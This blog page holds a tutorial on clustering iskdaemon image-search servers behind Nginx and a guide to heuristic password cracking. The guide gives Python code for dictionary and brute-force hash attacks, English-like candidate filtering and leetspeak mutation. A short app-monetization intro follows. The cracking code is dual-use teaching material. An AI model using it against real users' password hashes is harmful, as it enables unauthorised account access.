A Blog About Anime, Code, and Pr0 H4x

Table of Contents

imgSeek - Overcoming Performance Bottlenecks by Clustering Iskdaemon Instances
Building the Better Brute Force Algorithm - A Guide to Heuristic Password Cracking
Making Money with Apps - Choosing the Right Platform and Monetization Strategy
iOS - How to convert BGRA video streams to Grayscale SUPER fast.
Hijacking Web Traffic
Squashing Bandwidth Leeches
Sidestepping Windows Software Restriction Policies
Network Ninjitsu: The Art of Bypassing Firewalls and Web Filters

imgSeek - Overcoming Performance Bottlenecks by Clustering Iskdaemon Instances

March 13, 2013 at 12:00 PM

imgSeek (and its server-side variant iskdaemon) is an open source image matching engine developed by Ricardo Cabral. In a nutshell, imgSeek makes it possible (with just a little bit of hacking) to perform reverse image searches and visual similarity comparisons against a specific group of images of your choice, just like Google Images or TinEye (but without the beefy monthly fees). For more information, take a look at the official imgSeek documentation.

For those of you who may not see the value in being able to do reverse image searches and visual similarity comparisons on an arbitrary set of images, allow me to elaborate with a real-world example of how I use imgSeek.

Ever since mid-November I've been using imgSeek to handle all of the server-side logic behind the "identify a card by taking a picture of it" feature of my iOS app Duel Master: Yu-Gi-Oh Edition. With this feature all a user has to do is take a picture of a Yu-Gi-Oh card, and within seconds all of the relevant information about that particular card (details, rulings, prices, etc) will be presented to them. This is all accomplished by uploading the picture they took to one of the Studio Bebop API servers, feeding it through imgSeek, and then returning the results to the app for additional processing and presentation. You can see a demonstration of this feature in action in the promo video below.

As you can see, imgSeek definitely works, and it works pretty well too. However, don't let my super awesome app promo fool you: there are some serious drawbacks and kinks to using imgSeek. Despite the fact that imgSeek is technically stable enough to be deployed for real-world projects, the truth is that it is still in-development software, and as such it suffers from bugs, hiccups, and scary segmentation faults.

Moreover, imgSeek doesn't scale very well, especially when it comes to handling lots of requests at once. While there is some vague mention of a "clustered mode" in the default iskdaemon configuration file, it isn't actually an implemented feature yet. A stock copy of iskdaemon can only process one request at a time, so if you hit it with lots of requests at once, you're going to see some serious lag. If it takes roughly one second for your copy of iskdaemon to perform a visual similarity comparison, and you've got twenty or thirty requests in the queue, you can expect some serious latency. (Which will only grow worse as you add more images to your database.)

Luckily for all of you, I've taken it upon myself to implement fixes for all of these gripes (and a few more I didn't bother mentioning), and put them into a special branch of iskdaemon called iskdaemon-clustered!

Clustered Access Layout

The basic theory behind clustering instances of iskdaemon is pretty straightforward. First you launch multiple instances of iskdaemon, each listening on a different port, but all sharing the same image database file. Then you use Nginx (or whatever HTTP daemon floats your boat) to handle the actual load balancing via a round robin style proxy pass. Simple right? WRONG! Well sort of...

The above layout will work fine as long as you're just performing read requests (queryImgID, queryImgBlob, queryImgPath), but once you start doing write requests (addImgBlob, addImg) through the load balancing proxy pass, that's when things start to break. To put it simply, your instance nodes will start to develop database inconsistencies with each other, by which I mean that some nodes will have an image while others won't. Moreover, once you start trying to save/load to the same database file, things get even worse, because that's when you'll start to see endless loops of database errors and/or crashes.

To overcome this shortcoming, I decided to tweak things so that there is a separate instance of iskdaemon running outside of the proxy pass group, that is specifically dedicated to performing write requests. Then with the addition of some fancy h4x, I made it so that the reader iskdaemon instances in the proxy pass group automatically update their local copies of the image database so that they are always up to date.

Implementing the separate writer instance was pretty straightforward, but the logic behind keeping all of the reader instances up to date is a bit more complicated. In the next section I'll go over in detail how I do that. You don't have to read the next section to compile/install iskdaemon-clustered, but you probably should. If you don't feel like it, skip ahead to Installing iskdaemon-clustered On Your Server.

Overcoming Database Inconsistencies With Multiple Iskdaemon Instances


Clustered access layout with separate writer instance.

The reason that parallel iskdaemon instances can develop database inconsistencies in the first place lies in the fact that iskdaemon reads and writes its image data to a single database file that is only read into memory when the iskdaemon process first starts. Any image data you add via addImgBlob or addImg is held only in memory until you call saveDb.

So when you add an image to your images database using one of your parallel instances of iskdaemon, the other instances won't know about it until they reread the database file, which normally only happens when you start iskdaemon. To overcome this hurdle I've modified queryImgBlob and queryImgID so that they call a special function that checks to see if the images database has been modified since the last time there was a read request, and rereads it into memory if there have been any changes, before doing any actual image matching work.

Unfortunately rereading the database file into memory is trickier than you might think. If for instance you try to reread the database file while your writer process is in the middle of saving its new changes, you'll more than likely run into a fat load of read errors that could potentially send your reader instances into an infinite loop of database errors. To work around this issue, I implemented another special function that copies the main images database file into a temporary file, which is read, and then deleted. If the read fails for some reason, the function recurses into itself until it successfully rereads the image database file. I'll be the first to admit that it's not the most elegant of solutions, but it's simple, and it works.
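
To make the idea concrete, below is a minimal Python sketch of that reload logic. It is not the actual iskdaemon-clustered code, and load_isk_db() is a hypothetical stand-in for whatever routine parses the image database file into memory.

import os
import shutil
import tempfile
import time

class DbReloader(object):
    def __init__(self, db_path, load_isk_db):
        self.db_path = db_path          # main image database file (written by the writer instance)
        self.load_isk_db = load_isk_db  # hypothetical loader that reads the db file into memory
        self.last_mtime = 0

    def refresh_if_stale(self):
        # Only bother rereading if the writer has saved new changes since our last read
        mtime = os.path.getmtime(self.db_path)
        if mtime <= self.last_mtime:
            return
        self.last_mtime = mtime
        self._safe_reload()

    def _safe_reload(self):
        # Copy the db to a temporary file first, so a half-finished saveDb on the
        # writer side can't wedge this reader. Retry until a copy reads cleanly.
        while True:
            fd, tmp_path = tempfile.mkstemp(suffix=".iskdb")
            os.close(fd)
            try:
                shutil.copyfile(self.db_path, tmp_path)
                self.load_isk_db(tmp_path)
                return
            except Exception:
                time.sleep(0.1)  # the writer was probably mid-save, try again
            finally:
                os.remove(tmp_path)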

Below is a flow chart that outlines the process iskdaemon-clustered uses to handle read requests without running into database inconsistencies.



Installing iskdaemon-clustered On Your Server

Please note that the following instructions are for compiling/installing on a *nix system. You're on your own, Windows users.

First up, make sure you have all of the necessary prerequisites. (If you are using Gentoo, you should be able to emerge all of this stuff without any problems.)

  • git
  • nginx
  • python version >= 2.5 (but not 3.0 yuck!) and python development libraries
  • python twisted matrix libs 8.x or later
  • python SOAPpy package 0.12
  • C/C++ compilers
  • libmagick
  • libmagick++
  • SWIG

Next, clone the iskdaemon-clustered Github repository.

git clone https://github.com/StudioBebop/iskdaemon-clustered.git

Now compile iskdaemon-clustered!

$ cd iskdaemon-clustered
$ cd src
$ python setup.py build
$ sudo python setup.py install

Assuming that you have all of the necessary prerequisites and nothing went wrong, iskdaemon-clustered should now be installed on your system. If you are having problems compiling, try taking a look at the installation instructions on the imgSeek website.

Now for the fun part, configuring your iskdaemon cluster! As I explained earlier, the basic concept here is to launch multiple instances of iskdaemon.py in parallel that all share the same database file. To make this easier for you, I've included a python script (launch-clustered-isk.py) that makes this super easy (again it's a little hacky, but it gets the job done without too much work).

First copy launch-clustered-isk.py to wherever you'd like to hold the database and other files for your iskdaemon cluster. (I just use my home directory.)

cp iskdaemon-clustered/launch-clustered-isk.py ~

launch-clustered-isk.py should work right out of the box, but for the sake of learning, let's take a quick peek at its configuration options.

Open launch-clustered-isk.py up in your favorite text editor (Nano master race reporting in). Lines 19-23 are where you can make adjustments as you need/want to. Each line is commented, but I'll give you a quick overview anyway, along with a rough sketch of the launch pattern after the list.

  • instance_count = 13
    This sets how many instances of iskdaemon.py you'd like to launch. With the default configuration 13 instances will be launched. 1 for writing, and 12 for reading.
  • start_port = 1336
    This sets the port to start your instances listening on. With each instance the listening port will be incremented by 1.
    • Instance 1 - listens on port 1336
    • Instance 2 - listens on port 1337
    • Instance 3 - listens on port 1338
  • execpath = "/usr/bin/iskdaemon.py"
    This sets the path to iskdaemon.py. The default value _should
    work, but you will need to adjust it if you ended up installing isdkaemon.py somewhere else.
  • isk_root = os.path.join(os.path.abspath("."), "isk-cluster")
    This sets the path that will be created to hold all of the iskdaemon cluster files. You should probably leave this line alone.
  • iskdbpath = os.path.join(os.path.abspath("."), "isk-db")
    This sets the path to the main iskdaemon image database file. You should probably leave this line alone.
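
For the curious, here is a rough Python sketch of the general pattern a launcher like this follows: spin up one process per instance, and restart any instance that dies. This is not the actual launch-clustered-isk.py, and the iskdaemon.py invocation below is only a placeholder, since how each instance learns its port (command line flag vs. per-instance settings file) depends on your setup.

import multiprocessing
import os
import subprocess
import sys
import time

instance_count = 13                  # 1 writer + 12 readers
start_port = 1336
execpath = "/usr/bin/iskdaemon.py"
isk_root = os.path.join(os.path.abspath("."), "isk-cluster")

def run_instance(port):
    # Give each instance its own working directory under isk_root so logs and
    # settings don't collide, then keep relaunching it if it ever crashes.
    workdir = os.path.join(isk_root, "instance-%d" % port)
    if not os.path.isdir(workdir):
        os.makedirs(workdir)
    cmd = [sys.executable, execpath]  # placeholder invocation
    while True:
        subprocess.call(cmd, cwd=workdir)
        time.sleep(1)                 # don't spin too hard if it keeps dying

if __name__ == "__main__":
    for i in range(instance_count):
        multiprocessing.Process(target=run_instance, args=(start_port + i,)).start()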

Once you have launch-clustered-isk.py configured just the way you want it, it's time to configure Nginx to handle proxying requests to your cluster.

Open up Nginx's config file (should be /etc/nginx/nginx.conf on Gentoo) in your favorite text editor, and in the http{} section, add the following lines.

http {
    upstream isk-cluster {
        server localhost:1337;
        server localhost:1338;
        server localhost:1339;
        # ... skipping some lines, and assuming you configured 12 reader instances
        server localhost:1346;
        server localhost:1347;
        server localhost:1348;
    }

    # listen on localhost on port 81
    server {
        listen 81;
        server_name localhost;

        location / {
            proxy_pass http://isk-cluster;
        }
    }
}

Now (re)start Nginx, and then run launch-clustered-isk.py. If everything went right, you should see a bunch of lines about launching iskdaemon instances and listening on different ports. If you see error messages, something has gone terribly terribly wrong, and it's up to you to figure out what.

Assuming everything went as planned, you should now be able to access your iskdaemon read cluster at http://localhost:81, and your writer instance at http://localhost:1336. Have fun!
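
To give you an idea of how you might talk to the cluster from code, here is a small Python sketch using XML-RPC. The /RPC endpoint path, the database id, and the exact argument order of these calls are assumptions on my part, so double-check them against your iskdaemon build.

import base64
import xmlrpclib  # Python 2, to match iskdaemon's Python 2 requirement

DB_ID = 1  # assumed database id

# Readers sit behind Nginx on port 81, the writer listens directly on port 1336.
reader = xmlrpclib.ServerProxy("http://localhost:81/RPC")
writer = xmlrpclib.ServerProxy("http://localhost:1336/RPC")

# Add a new image through the writer instance (base64 encoded blob, as described
# in the tips below), then save so the readers pick up the change.
data = base64.b64encode(open("some-card.jpg", "rb").read())
writer.addImgBlob(DB_ID, 42, data)
writer.saveDb(DB_ID)

# Query for visually similar images through the load balanced readers.
query = base64.b64encode(open("photo-of-card.jpg", "rb").read())
print reader.queryImgBlob(DB_ID, query, 5)  # top 5 matches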

Miscellaneous Tips and Information

  • launch-clustered-isk.py isn't a daemon process. If you want to launch and forget it, do what I do, and launch it in a screen.

    $ screen
    $ ./launch-clustered-isk.py &
  • launch-clustered-isk.py uses infinite loops to keep your various iskdaemon instances running, even if they crash. If you want to shut down your iskdaemon cluster, execute the following commands.

    $ killall launch-clustered-isk.py
    $ killall iskdaemon.py
  • I've modified the queryImgBlob and addImgBlob functions a little bit. To use them, send them base64 encoded image data. I did this so that I could use these functions with Ruby's default XMLRPC library.
  • An additional way you can give your iskdaemon instances a boost is by renicing them. To renice your entire iskdaemon cluster, execute the following command.

    $ sudo renice -n -10 -p $(pgrep iskdaemon.py)
  • Iskdaemon and iskdaemon-clustered are resource monsters. Make sure you have the hardware resources necessary to run things smoothly. You don't want to be dipping heavily into swap space because you ran out of RAM.
    • I'm running my iskdaemon cluster on a server with 64gb of RAM and an SSD for the database files.
  • I use iskdaemon-clustered in the following projects.

  • If you have an idea to improve iskdaemon-clustered, or are using it in a project, let me know!

Building the Better Brute Force Algorithm - A Guide to Heuristic Password Cracking

July 23, 2012 at 12:00 PM

As seen in the Summer 2012 edition of 2600: The Hacker Quarterly.

Let's begin with a brief overview of standard (non-decryption based) password cracking methods. When you're faced with the task of cracking a password hash, and reversing the algorithm used to create the hash of the original password isn't a viable choice, you are left with a couple of different options.

Dictionary Attacks

A dictionary attack is carried out by iterating through a list of words, creating a hash of each one, and comparing the result to your target hash until you find a match. While dictionary based cracking methods can be used to crack a lot of common passwords, they're not all that effective when things start to become more complicated.
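
In code, a dictionary attack is only a few lines. Here is a minimal Python sketch, assuming an unsalted MD5 hash and a newline-separated wordlist:

import hashlib

def dictionary_attack(target_hash, wordlist_path):
    # Hash each candidate word and compare it against the target hash
    with open(wordlist_path) as wordlist:
        for word in wordlist:
            word = word.strip()
            if hashlib.md5(word.encode()).hexdigest() == target_hash:
                return word
    return None

# Example: 5f4dcc3b5aa765d61d8327deb882cf99 is the MD5 of "password"
print(dictionary_attack("5f4dcc3b5aa765d61d8327deb882cf99", "/usr/share/dict/words"))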

Often people use one or more words in their password, and those words may or may not be separated by a space or contain numbers or punctuation. Take, for example, the password "falconpunch". It contains the two words "falcon" and "punch". Both of these words are found in a standard list of dictionary words, but you wouldn't be able to crack this password using a dictionary attack, because they're mashed together to form a single 'word'.

We also run into the same issue with passwords that are made up of, or include, portmanteaus that are not generally found in dictionary lists. Take for instance the portmanteau made from combining the words "char" and "lizard". Chances are pretty good that your dictionary list doesn't include the word "charizard", thus rendering a dictionary attack not very effective for that password.

Brute Force Attacks

When dictionary attacks just won't do, you can always try cracking the password using the brute force method. A brute force attack is carried out by cycling through every possible combination of a sequence of characters (aaaa, aaab, aaac, etc), and hashing each one until you find the sequence whose hash matches your target hash.

The benefit of using a brute force attack is that it is guaranteed to eventually crack your password hash. The downside is that iterating through every possible combination of a sequence of characters until you find a match for your target hash could end up taking a very long time, and it only gets worse the longer and more complicated your target password is.
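
For comparison, here is a minimal Python sketch of a standard brute force attack over the letters a-z plus the space character, again assuming an unsalted MD5 target:

import hashlib
import itertools
import string

def brute_force(target_hash, max_length):
    alphabet = string.ascii_lowercase + " "  # a-z plus the space character (27 symbols)
    for length in range(1, max_length + 1):
        for combo in itertools.product(alphabet, repeat=length):
            candidate = "".join(combo)
            if hashlib.md5(candidate.encode()).hexdigest() == target_hash:
                return candidate
    return None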

Take for example the password "charizard rules". That's a password that is 15 characters long, and only contains letters and spaces. Simple right? Well in order to crack this password using a brute force attack, you would need to iterate through every possible combination of the letters a-z and the space (" ") character from a length of one to at least fifteen characters. Let's do some math to see just how many combinations (in theory) we would have to try.

Characters      Total Combinations
1  (27^1)       27
2  (27^2)       729
3  (27^3)       19,683
4  (27^4)       531,441
5  (27^5)       14,348,907
6  (27^6)       387,420,489
7  (27^7)       10,460,353,203
8  (27^8)       282,429,536,481
9  (27^9)       7,625,597,484,987
10 (27^10)      205,891,132,094,649
11 (27^11)      5,559,060,566,555,523
12 (27^12)      150,094,635,296,999,121
13 (27^13)      4,052,555,153,018,976,267
14 (27^14)      109,418,989,131,512,359,209
15 (27^15)      2,954,312,706,550,833,698,643

That's a total of 3,067,940,118,341,250,379,359 combinations.
At a rate of testing 50 hashes per second, it would take about 1,945,674,859,424 years to try every possible combination. That's almost two trillion years!
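
If you want to double-check that math yourself, a couple of lines of Python will do it:

combos = sum(27 ** length for length in range(1, 16))
print(combos)                              # 3067940118341250379359
print(combos / (50 * 60 * 60 * 24 * 365))  # roughly 1.95 trillion years at 50 hashes per second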

Now I'm not sure about you, but waiting a couple trillion years to crack someone's password sucks. So let's try cutting down that brute forcing time, by operating under the assumption that our target password has to be at least seven characters long. That means that we only need to calculate the combinations of the letters a-z and the space (" ") from a length of seven characters to at least fifteen characters. Let's see how our math looks now.

Characters      Total Combinations
7  (27^7)       10,460,353,203
8  (27^8)       282,429,536,481
9  (27^9)       7,625,597,484,987
10 (27^10)      205,891,132,094,649
11 (27^11)      5,559,060,566,555,523
12 (27^12)      150,094,635,296,999,121
13 (27^13)      4,052,555,153,018,976,267
14 (27^14)      109,418,989,131,512,359,209
15 (27^15)      2,954,312,706,550,833,698,643

That's a total of 3,067,940,118,340,848,058,083 combinations.
At a rate of testing 50 hashes per second, it would still take about 1,945,674,859,424 years to try every possible combination. Skipping everything shorter than seven characters only trimmed about 400 million candidates off the total, which at 50 hashes per second doesn't even save us a full year. We're still staring down almost two trillion years.

Conclusion

From the information above we've learned that dictionary attacks are nice, but aren't much help when trying to crack a password more complicated than something your grandma might come up with (i.e. passwords consisting of more than just a single word, or ones that include non-standard portmanteaus). We've also learned that a brute force attack will (eventually) crack any target password with a 100% rate of success, but it'll probably take a few eons to crack longer, more complicated passwords.

So what's a devilishly good looking super hacker to do? Why the answer is obvious. You need to use a smarter brute forcing algorithm!

Before We Continue

You may have noticed that I've conveniently forgotten to mention anything about passwords that include numbers or funky punctuation ($, &, @, etc). It's not that I don't acknowledge the existence of passwords like these, it's just that at this point we're only going to focus on passwords that use the letters a-z, spaces (" "), hyphens and underscores (- _), and common grammatical punctuation (. , ' ? !). I'll address all those kooky complicated passwords later on.

The Psychology of Password Creation

The primary issue with using a brute force attack to crack most real world passwords is that it spends a ton of time comparing hashes generated from phrases like,

  • aaaaaaaaa
  • aaacccaad
  • xcv hjj abu
  • hhgdfgdrfg

Now these are all spiffy secure passwords, but you'd be hard pressed to find someone who would actually use a password like one of these. Granted there are a select group of paranoid types who I'm sure use passwords like these all the time, but more often than not people tend to pick passwords that they can actually remember; passwords that actually contain words. These words may not necessarily always be separated by spaces, be spelled correctly, or even appear in a dictionary, but they are all still at least words. They are phrases that can be read aloud, and phrases that people say aloud in their minds as they type them in.

Take for instance the words "falcon" and "punch", and all of the different ways they could be arranged to make a password. A few possible combinations would be "falcon punch", "falconpunch", "falcon punch!", "falconpunch!", and "falcon, punch!". Looking at these passwords, no matter how they're put together, the resulting password always includes the words "falcon" and "punch", and when you read it out loud, it's "falcon punch".

So in order to crack a 'regular password' (i.e. passwords that aren't random sequences of nonsense), we need a more heuristic brute forcing algorithm that doesn't waste its time on unrealistic passwords like "aaaa" and "asdxcv", but instead focuses exclusively on generating passwords made up of words that adhere to the rules of English-like words and phrases.

What is an English-like Word or Phrase?

An English-like word is a word that may not necessarily be an actual English word, but still adheres to a series of rules that our brains use to determine whether or not a given sequence of characters qualifies as a "word". Therefore, an English-like phrase is a grouping of two or more English-like words that adhere to the rules that determine whether or not a group of words qualifies as a valid phrase.

Take for instance this article you're reading right now. As you take in each word, your brain is running a series of tests to make sure that the word you're looking at is actually a word, and not just a bunch of random letters. If I were to drop the word 'kguifdgj' in the middle of a sentence, your brain would automatically flag that word as not being a valid word because it doesn't follow the 'rules' of English-like words. That is, certain rules that every word follows in order to be considered a valid word by our brains. Therefore, you would conclude that that particular sentence was not a valid sentence because it wasn't made up entirely of valid words.

So in order to create a brute forcing algorithm that doesn't waste its time on nonsense words like "sfdre" and "86ugkie65", we need to 'teach' it how to perform at least some of those same tests that our brain does for us automatically, so that it can determine whether a word or phrase is valid or just gibberish. By doing this, we create a brute force algorithm that only generates possible passwords that an everyday person would potentially use, which in turn drastically reduces the amount of time spent generating extremely unlikely possible passwords.

The Rules of English-like Words

Apostrophes

A word cannot include more than one apostrophe. If a word includes an apostrophe, the apostrophe can only be positioned as the last character, or second to last character, in the word. Moreover, an apostrophe's last bordering letter must be an s.

Examples:

  • chuck's is a valid word
  • chucks' is a valid word
  • chuck'x is not a valid word
  • ch'uks is not a valid word


Hyphens and Underscores

A word cannot include both hyphens and underscores. If a word includes hyphens or underscores, the word should be split at that punctuation, and each piece should be tested independently for whether or not it is a valid English-like word.

Examples:

  • snape-kills_dumbledore is not valid (it mixes hyphens and underscores)
  • light_sabers_are_awesome should be split at the underscores, and the individual words should be tested separately to determine whether they are valid or not. If any of the individual words are invalid, then the entire word is invalid as well.

Ending Punctuation (! ? , .)

A word cannot include more than one instance of ending punctuation, and any occurrence of such punctuation can only be positioned as the last character of a word.


Other Punctuation (&, &, @, etc)

A word cannot include any instances of other punctuation.


Suffixes

If a word ends in a known suffix (ing, ist, scope, ology, etc), the last character before the suffix cannot be the same as the first letter of the suffix.

Examples:

  • psychology is a valid word
  • psychoology is not a valid word

Note: There are a few words that don't follow this rule, like zoology. However since words like these are the (rare) exception to the rule, it's more effective to just ignore them.


Vowels

Words must include at least one vowel.

Character Repetition Patterns

The same character can never be repeated more than twice in a row.

Examples:

  • books is a valid word
  • boooks is not a valid word

The same sequence of characters can never be repeated more than twice in a row.

Examples:

  • mahimahi is a valid word
  • mahimahimahi is not a valid word
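
Taken together, the structural rules above can be rolled into a short validator. Here is a minimal Python sketch, with only a token suffix list and without the character position analysis covered next:

import re

VOWELS = set("aeiou")
SUFFIXES = ["ing", "ist", "scope", "ology"]  # a small sample list

def valid_word(word):
    word = word.lower()
    # At most one ending punctuation mark, and only as the last character
    if sum(word.count(c) for c in "!?,.") > 1:
        return False
    word = word.rstrip("!?,.")
    if re.search(r"[!?,.]", word):
        return False
    # Hyphens and underscores: never both, and split on whichever appears
    if "-" in word and "_" in word:
        return False
    if "-" in word or "_" in word:
        return all(valid_word(part) for part in re.split(r"[-_]", word))
    # Apostrophes: at most one, only in the last two positions, and bordering an s
    if word.count("'") > 1:
        return False
    if "'" in word:
        i = word.index("'")
        if i < len(word) - 2:
            return False
        if "s" not in (word[i - 1:i], word[i + 1:i + 2]):
            return False
        word = word.replace("'", "")
    # No other punctuation (or digits)
    if re.search(r"[^a-z]", word):
        return False
    # Suffix rule: "psychology" is fine, "psychoology" is not
    for suffix in SUFFIXES:
        if word.endswith(suffix) and len(word) > len(suffix):
            if word[-len(suffix) - 1] == suffix[0]:
                return False
    # Must contain at least one vowel
    if not VOWELS & set(word):
        return False
    # No character repeated more than twice in a row, and no sequence repeated more than twice
    if re.search(r"(.)\1\1", word):
        return False
    if re.search(r"(..+)\1\1", word):
        return False
    return True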

Character Position Analysis

One of the great things about computers is that they're very good at performing simple tasks over and over really fast. Because of this trait, there are certain tests we can have the computer perform to validate words that wouldn't be efficient to run by hand. One such test is Character Position Analysis.

A Character Position Analysis is a test performed by iterating through each character in a word, and analyzing that character's relationship with its neighboring characters in order to determine whether or not certain characters 'fit' next to each other.

To perform a Character Position Analysis, you first need to build a database that documents how often characters appear directly next to, or one character apart from, each other. This database is broken up into three separate tables that keep track of occurrence patterns for:

  • the first three characters of a word (starters table)
  • the last three characters of a word (enders table)
  • and the characters in a word as a whole (neighbors table).

Below is an example table documenting the overall character occurrence patterns for the word "awesome". Each cell holds two numbers. The first number represents the number of times a character appears directly next to another character, and the second number represents the number of times a character appears one character apart from another character.

      A     E     M     O     S     W
A   0, 0  0, 1  0, 0  0, 0  0, 0  1, 0
E   0, 1  0, 0  1, 0  0, 1  1, 0  1, 0
M   0, 0  1, 0  0, 0  1, 0  0, 1  0, 0
O   0, 0  0, 1  0, 0  0, 0  1, 0  0, 0
S   0, 0  1, 0  0, 1  1, 0  0, 0  0, 1
W   1, 0  1, 0  0, 0  0, 0  0, 1  0, 0

From the data in the table above, we can conclude that the letters 'a', 'e', 'm', 'o', and 's' never appear directly after the letter 'a'. We can then use this data to verify whether or not other words are valid. For example the word "amber" would be considered not valid, because the letter 'm' appears directly after the letter 'a' which our occurrence patterns table tells us isn't possible.

Well obviously 'amber' is a valid word (anyone who's seen Jurassic Park knows that), but the data we have in the table above says otherwise. So in order to perform an accurate Character Position Analysis, a very large list of words must be analyzed in order to build a useful set of character position occurrence tables. Such a list of words can be found here, http://www.bsdlover.cn/study/UnixTree/V7/usr/dict/words.html

Once you have a character position occurrence database, then you can perform a Character Position Analysis. A Character Position Analysis is broken up into three separate tests, and a word is only valid if it passes all three tests.


Starting Characters Position Analysis

This test is performed by taking the first three characters of a word, and checking in the starters table whether the occurrence count (aka neighbor score) for the first and second characters, or first and third characters is equal to zero. If either neighbor score is equal to zero, then the word is not valid.


Ending Characters Position Analysis

This test is performed by taking the last three characters of a word, and checking in the enders table whether the occurrence count (aka neighbor score) for the third to last and second to last characters, or the third to last and last characters, is equal to zero. If either neighbor score is equal to zero, then the word is not valid.


General Character Position Analysis

This test is performed by iterating through each character in a word, and checking in the neighbors table whether the neighbor score for the character being tested and the character directly next to it, or for the character being tested and the character one position away from it, is equal to zero. If any of the neighbor scores is equal to zero, then the word is not valid.


Getting More Accurate Results

One way to get more accurate results when performing a Character Position Analysis is to raise the minimum required neighbor score from zero to a higher threshold.
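
Here is a minimal Python sketch of the whole process: build the three occurrence tables from a wordlist, then run the three position tests with an adjustable threshold. This illustrates the idea rather than any particular implementation's exact table layout.

from collections import defaultdict

def build_tables(wordlist_path):
    # For every ordered character pair, count how often the pair appears directly
    # adjacent (distance 1) and one character apart (distance 2), in three contexts:
    # the first three characters, the last three characters, and the whole word.
    starters = defaultdict(int)
    enders = defaultdict(int)
    neighbors = defaultdict(int)

    def count(table, chunk):
        for i, a in enumerate(chunk):
            if i + 1 < len(chunk):
                table[(a, chunk[i + 1], 1)] += 1
            if i + 2 < len(chunk):
                table[(a, chunk[i + 2], 2)] += 1

    with open(wordlist_path) as f:
        for word in f:
            word = word.strip().lower()
            if len(word) < 3:
                continue
            count(starters, word[:3])
            count(enders, word[-3:])
            count(neighbors, word)
    return starters, enders, neighbors

def passes_position_analysis(word, starters, enders, neighbors, threshold=0):
    word = word.lower()
    if len(word) < 3:
        return True  # too short to analyze
    first, last = word[:3], word[-3:]
    # Starting characters test: first and second, first and third
    if starters[(first[0], first[1], 1)] <= threshold:
        return False
    if starters[(first[0], first[2], 2)] <= threshold:
        return False
    # Ending characters test: third to last and second to last, third to last and last
    if enders[(last[0], last[1], 1)] <= threshold:
        return False
    if enders[(last[0], last[2], 2)] <= threshold:
        return False
    # General test over the whole word
    for i in range(len(word)):
        if i + 1 < len(word) and neighbors[(word[i], word[i + 1], 1)] <= threshold:
            return False
        if i + 2 < len(word) and neighbors[(word[i], word[i + 2], 2)] <= threshold:
            return False
    return True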

Rules of English-like Phrases

Spaces

A valid English-like phrase cannot include any occurrence of three or more space characters (" ") in a row. If a phrase contains two spaces in a row, it should be split at the double space, and each sub-phrase should be tested separately. If any of the sub-phrases are not valid, then the entire phrase is not valid.

Examples:

  • "row row fight the power" is a valid phrase
  • "it's dangerous to go alone, take this" is not a valid phrase (because there are three spaces in a row)


Word Repetition

The same word can never be repeated more than three times in a valid English-like phrase.

Examples:

  • "row row fight the power" is a valid phrase
  • "row row row row your boat" is not a valid phrase


Phrase Ending Punctuation (! ? .)

Phrase ending punctuation may only appear at the end of a phrase.

Examples:

  • "zelda is so over powered in brawl!" is a valid phrase
  • "zelda is so! over powered in brawl!" is not a valid phrase


Commas

Commas may only appear at the end of words, and never at the end of a phrase.

Examples:

  • "charizard is cool, but so is blastoise" is a valid phrase
  • "cooking is so fun," is not a valid phrase


Words

In order for an English-like phrase to be considered valid, each word in the phrase must be a valid English-like word.
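
A minimal Python sketch of the phrase rules might look like this (it assumes the valid_word() sketch from the word rules section is in scope):

def valid_phrase(phrase):
    # Three or more spaces in a row is never valid
    if "   " in phrase:
        return False
    # Split at double spaces and test each sub-phrase separately
    if "  " in phrase:
        return all(valid_phrase(p) for p in phrase.split("  "))
    words = phrase.split(" ")
    # The same word can never be repeated more than three times
    for w in set(words):
        if words.count(w) > 3:
            return False
    for i, w in enumerate(words):
        # Phrase ending punctuation (! ? .) may only appear on the last word
        if w.rstrip("!?.") != w and i != len(words) - 1:
            return False
        # Commas may never end a phrase
        if w.endswith(",") and i == len(words) - 1:
            return False
        # Every word must be a valid English-like word
        if not valid_word(w):
            return False
    return True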

So what about those passwords that include numbers, or goofy punctuation?

While heuristic brute forcing algorithms are great for generating English-like words and phrases, things get a lot more complicated if your target password includes numbers or funky punctuation ($, &, @, etc).

Going back to the topic of the psychology of password creation, remember that in general people pick passwords that are actually made up of words. Keeping this in mind, we can reasonably conclude that passwords that include numbers and/or funky punctuation still follow this rule, but that the word(s) in the password are obfuscated by these non-standard characters. Another point to consider is that when a password includes numbers, they're often just appended to the end.

Take for instance the password "jalapeno". It's a valid English-like word, and using it as a base, you can obfuscate it with numbers and funky punctuation.

Examples:

  • "jalapen0", "jalap3no", "j414p3n0" - letters replaced with numbers
  • "jalapeno1", "jalapeno123" - numbers appended
  • "j@l@peno" - letters replaced with punctuation

All of the passwords above would not be considered valid English-like words, but under all of the numbers and punctuation, they actually are. So in order to crack passwords that include numbers and/or funky punctuation using a heuristic brute force algorithm, you need to develop a method that can mutate strings generated by the algorithm (making alterations like in the examples above) and then test all the password variants as well as the original password string against your target hash.
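
As a sketch of that mutation step, here is a small Python generator that expands a base word with a few common letter substitutions and appended digits. The substitution table and suffix list below are illustrative samples, not an exhaustive set:

import itertools

LEET = {"a": ["a", "@", "4"], "e": ["e", "3"], "i": ["i", "1"],
        "o": ["o", "0"], "s": ["s", "$", "5"]}
COMMON_SUFFIXES = ["", "1", "12", "123", "!", "2012"]

def mutations(word):
    # Yield the word with every combination of the substitutions above,
    # each optionally followed by a commonly appended suffix.
    choices = [LEET.get(c, [c]) for c in word]
    for combo in itertools.product(*choices):
        base = "".join(combo)
        for suffix in COMMON_SUFFIXES:
            yield base + suffix

# "jalapeno" expands to variants like "jalapen0", "j4l4p3n0", and "j@lapeno123"
for candidate in mutations("jalapeno"):
    pass  # hash and compare each candidate against the target hash here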

Are there any heuristic brute forcing programs available?

Why yes there are! I maintain a small proof-of-concept Ruby application/gem that implements heuristic brute forcing. See, http://github.com/jamespenguin/gentle-brute for more details.

Conclusion

Heuristic brute forcing provides hackers with the ability to crack long and complicated passwords using brute force style password cracking, while not wasting eons trying unrealistic passwords.

To illustrate my point, let's pit heuristic brute forcing against standard brute forcing to crack a five character password consisting of the letters a-z.

  • Using heuristic brute forcing (via the Ruby program above): 517,839 potential phrases
  • Using standard brute forcing: 11,881,376 potential phrases

That's 96% fewer phrases to try using heuristic brute forcing, compared to standard brute forcing!

Making Money with Apps - Choosing the Right Platform and Monetization Strategy

March 14, 2012 at 12:00 PM

I started developing mobile apps back in early 2009 after a friend suggested I try it out. I jumped in head first with no idea what I was doing, and it wasn't until August of that year that I finally had my first app approved and released on the Apple App Store, getting my first real taste of app development success. Ever since then, I've made app development my career, have seen a lot of success, and have loved every minute of it.

